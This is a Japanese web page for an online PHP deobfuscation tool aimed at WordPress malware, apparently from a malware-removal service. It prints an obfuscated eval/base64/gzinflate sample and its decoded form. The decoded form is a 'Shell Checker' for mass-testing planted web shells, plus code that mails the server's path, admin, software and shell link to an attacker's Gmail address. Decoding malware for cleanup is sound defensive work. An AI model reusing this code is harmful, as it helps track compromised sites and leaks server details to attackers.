Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $U7TiM4T3 = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRVN1RpTTRUM19INHgwUiUyOSUyOSUyOSUyOSUyOSUzQg=="; $U7TiM4T3_H4x0R = "nqb18Vg/NkzG/fxE9qKDdHbjdNZmEujdQI96ntKSPouVilEHSz5/guJvf91fDm3czVU6dEW/GF9m6TWdDFAONYzuca1Q3P4J1/LC+qzbV8/4v4MOgSGC4XKXo8Z/awrP/h63UL8HJi853jC+PPZKIyCxTkLWi1+woePJ4E/kEBM+H62zPypj/vvgDHeYwBHLEEeLi8uwKStL/Z05khDdXapG6Ae1bMjruOkKpPbG/QpqMa9gVvZGpWeGP8yyyThuSMXNGhHeKuWmgh/TaZxNuxp66P+6gqXzhPbSZGJrwwvgnAdI76qqVFig+xzSfg3TsCbaCcfqs4euFdOnOmRGYoc1ykqkotSzFMFIXDzIe0q/ZzLjTmgd6haJoUpziBYzqIZ0mMHpENrGShCEup+kmPjTkpW2T4GZoFhOjBiQ9FZtoxgyx1K27QL6TqzRvKgzgzBcqyfHrXjvgCcdAIkyPujnyAXfwd+Yd+gc5KTU+7T5zU+NyUVswJHutkBS4RoH0p7RSveiUv0ctYvMQ1ySadm0+AeiWmvgrad1jLZxP920D4ENObdem+q1gZJxtA7ZNi7Ava56nXVW1s1R6+Eh3LhAd9cyynpJeGXTLZ2oGIcayCwNEkJlNk76mPIHr5prUhVulrnCotuvsVZcZjCFqDCorHCx3HS2NMLiurA3xK5DbluCRKWAssgX2AUSrKQSiZ2T5C/M53M4utqQ9+yqDDlbqmIMRgBvK4rYm93WeeQnYsEwS7ci4ZJt0GdFeZ0qtCEbqczFONe8/rH1Onvqk6ozcsRzVE9v1s+kUk9eT3WNXnkXppxXiEvirukvw2GhtlJ512iEWjPyTq409gmKNaM7ORDZEyCUntKNDt0VaL+1qx99WrdAUsYLOKq6j636nVT8wqvuqYaFStgFiYg0yJCbuKZlEIisLGBCo+juJLfGKXanhfKjdXxumBrrYBG/Xrui1o0riAfahB4ffOUJWOYmLZqSJgZ6cvPxNCIf+cgTdjPFJ0bhwL6aUoScosxBP3YnTgXYXeEG6WTcJjXhzT8JWUZsw6sYE3FaVKajQWqLaBYiFfZXIStxFbao1hCQrmVjOCyi8BW4rKMM7itqo9Ca6g36kH8t6b88NBf40iZM6hm/TWYG7gXQTCa/t34QshSwX/fSDaKrva2VFS62PJMMbO+1n4mzbUHRiUQFiMhq4Zj2YIkKYcs4xpV9gBnRFihK/dhP499BweuTHDga0H+gWL1zaCKrL2Bgpj89SpJe/qoGBD/aWeQ0r9t3+/ATlu1s5UOPjbWuNxFBGdcmF1b/DCtc7sCy5mackZ7Iuw4ktBTPeM3x/eLonbXDx5pULmh5RONF3bfKiMNv3b/nLu2cB/Zhe8RIvstg8RCx8j1S4M1SJYKAy25cPZhd5l5neZHZBSVUCPkjWf3v1rVT10d37BGvbgj2IHHV0TMoSSCFgY+miRC9cc4Zu0obKi8w+TCX+DhRj/UbW1In4tvoE0VA"; eval(htmlspecialchars_decode(urldecode(base64_decode($U7TiM4T3)))); exit; ?>
<?php
$U7TiM4T3 = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRVN1RpTTRUM19INHgwUiUyOSUyOSUyOSUyOSUyOSUzQg==";
$U7TiM4T3_H4x0R = "nqb18Vg/NkzG/fxE9qKDdHbjdNZmEujdQI96ntKSPouVilEHSz5/guJvf91fDm3czVU6dEW/GF9m6TWdDFAONYzuca1Q3P4J1/LC+qzbV8/4v4MOgSGC4XKXo8Z/awrP/h63UL8HJi853jC+PPZKIyCxTkLWi1+woePJ4E/kEBM+H62zPypj/vvgDHeYwBHLEEeLi8uwKStL/Z05khDdXapG6Ae1bMjruOkKpPbG/QpqMa9gVvZGpWeGP8yyyThuSMXNGhHeKuWmgh/TaZxNuxp66P+6gqXzhPbSZGJrwwvgnAdI76qqVFig+xzSfg3TsCbaCcfqs4euFdOnOmRGYoc1ykqkotSzFMFIXDzIe0q/ZzLjTmgd6haJoUpziBYzqIZ0mMHpENrGShCEup+kmPjTkpW2T4GZoFhOjBiQ9FZtoxgyx1K27QL6TqzRvKgzgzBcqyfHrXjvgCcdAIkyPujnyAXfwd+Yd+gc5KTU+7T5zU+NyUVswJHutkBS4RoH0p7RSveiUv0ctYvMQ1ySadm0+AeiWmvgrad1jLZxP920D4ENObdem+q1gZJxtA7ZNi7Ava56nXVW1s1R6+Eh3LhAd9cyynpJeGXTLZ2oGIcayCwNEkJlNk76mPIHr5prUhVulrnCotuvsVZcZjCFqDCorHCx3HS2NMLiurA3xK5DbluCRKWAssgX2AUSrKQSiZ2T5C/M53M4utqQ9+yqDDlbqmIMRgBvK4rYm93WeeQnYsEwS7ci4ZJt0GdFeZ0qtCEbqczFONe8/rH1Onvqk6ozcsRzVE9v1s+kUk9eT3WNXnkXppxXiEvirukvw2GhtlJ512iEWjPyTq409gmKNaM7ORDZEyCUntKNDt0VaL+1qx99WrdAUsYLOKq6j636nVT8wqvuqYaFStgFiYg0yJCbuKZlEIisLGBCo+juJLfGKXanhfKjdXxumBrrYBG/Xrui1o0riAfahB4ffOUJWOYmLZqSJgZ6cvPxNCIf+cgTdjPFJ0bhwL6aUoScosxBP3YnTgXYXeEG6WTcJjXhzT8JWUZsw6sYE3FaVKajQWqLaBYiFfZXIStxFbao1hCQrmVjOCyi8BW4rKMM7itqo9Ca6g36kH8t6b88NBf40iZM6hm/TWYG7gXQTCa/t34QshSwX/fSDaKrva2VFS62PJMMbO+1n4mzbUHRiUQFiMhq4Zj2YIkKYcs4xpV9gBnRFihK/dhP499BweuTHDga0H+gWL1zaCKrL2Bgpj89SpJe/qoGBD/aWeQ0r9t3+/ATlu1s5UOPjbWuNxFBGdcmF1b/DCtc7sCy5mackZ7Iuw4ktBTPeM3x/eLonbXDx5pULmh5RONF3bfKiMNv3b/nLu2cB/Zhe8RIvstg8RCx8j1S4M1SJYKAy25cPZhd5l5neZHZBSVUCPkjWf3v1rVT10d37BGvbgj2IHHV0TMoSSCFgY+miRC9cc4Zu0obKi8w+TCX+DhRj/UbW1In4tvoE0VA";
eval {
?><title> Shell Checker - U7TiM4T3 </title>
<?php
set_time_limit(0);
ini_get('max_execution_time');
function isSiteOnline($url)
{
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$page = curl_exec($ch);
//echo curl_error($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($httpcode >= 200 && $httpcode < 300) {
return true;
} else {
return false;
}
}
if (isset($_POST["submit"])) {
$count = array('on', 'off');
$shell = $_POST["shell"];
$shell2 = explode("\n", $shell);
$str = "";
foreach ($shell2 as $val) {
$x = trim($val, "\r");
$x = trim($x, "\n");
if (isSiteOnline($x)) {
$content = "{$x} \n";
$str .= "{$x} \n";
$count['on']++;
} else {
$count['off']++;
echo "";
}
}
echo "<html><head></head><body><center><h2>Online Shells</h2><div id='box'>";
echo '<center><font color="green">[' . $count['on'] . ']' . ' Shells online ' . '<font color="red">[' . $count['off'] . ']' . ' Shells offline </font> </font></center><br /> ';
echo "<center><textarea cols='62' rows='24'>";
echo "{$str} \n";
echo "</textarea>";
echo "</div></Body>";
} else {
?>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
<?php
echo "<center><h2>Shell Checker</h2><br>\r\n<div id='box'><center><form action='' method='POST'><textarea name='shell' placeholder='Paste all your shells here' cols='62' rows='24'></textarea><br/>\r\n<span id='results'></span> <input type='submit' name='submit' value='- Mass Check Shells -' /></form>\r\n</center></div></center>";
}
?>
<?php
$kime = "ultimate.haxor7@gmail.com";
$baslik = "Symlink Shell";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD .= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
};
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.